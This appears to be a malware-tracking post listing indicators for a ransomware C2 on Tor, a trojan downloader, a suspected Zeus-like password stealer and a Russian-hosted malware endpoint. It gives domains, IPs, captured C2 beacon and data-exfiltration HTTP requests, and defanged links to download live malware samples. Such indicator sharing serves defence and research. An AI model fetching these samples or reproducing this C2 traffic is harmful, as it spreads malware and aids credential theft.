qbstdn6k7iivyki2.onion (Lending Ransomware Hosted In France Roubaix Ovh Sas)


The ransomware is hosted on Tor.

Domain                          Address         Country
qbstdn6k7iivyki2.onion.direct   5.135.181.100   France

HTTP Requests :

5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct)
GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2

GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1
Host: qbstdn6k7iivyki2.onion.direct
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Trojan Downloader Hosted In 66 Different IPs


This sample contains a trojan downloader : hxxp://193.28.179.40/loader/harsh02.exe, around 1 MB in size.

indianmoneybag.in (HTTP Password Stealer Hosted In United States Provo Unified Layer)


Maybe a Zeus variant.

Domains :

repository.certum.pl            213.222.201.175
www.download.windowsupdate.com  184.25.56.173
crl.certum.pl                   213.222.201.210
myworkmustpayme.xyz             162.144.218.223
www.indianmoneybag.in           104.153.45.242
joemb009i.xyz                   162.144.218.223
cryfreeman042.ddns.net          41.138.167.135

HTTP Requests :

http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php
POST /wp-content/themes/twentyfourteen/css/php/gate.php HTTP/1.0
Host: www.indianmoneybag.in
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 506
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://myworkmustpayme.xyz/wp-admin/css/panel/config.jpg
GET /wp-admin/css/panel/config.jpg HTTP/1.1
Accept: */*
Connection:

pltd.myjino.ru (HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)


Domain Name : pltd.myjino.ru  81.177.140.144

HTTP Requests :

http://pltd.myjino.ru/finsess.php

Data :

POST /finsess.php HTTP/1.0
Host: pltd.myjino.ru
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

1=1882869218&2=&3=&99=15&^

Get sample here : hxxp://93.95.99.172/0310_crypted.exe

Hosting info : http://whois.domaintools.com/81.177.140.144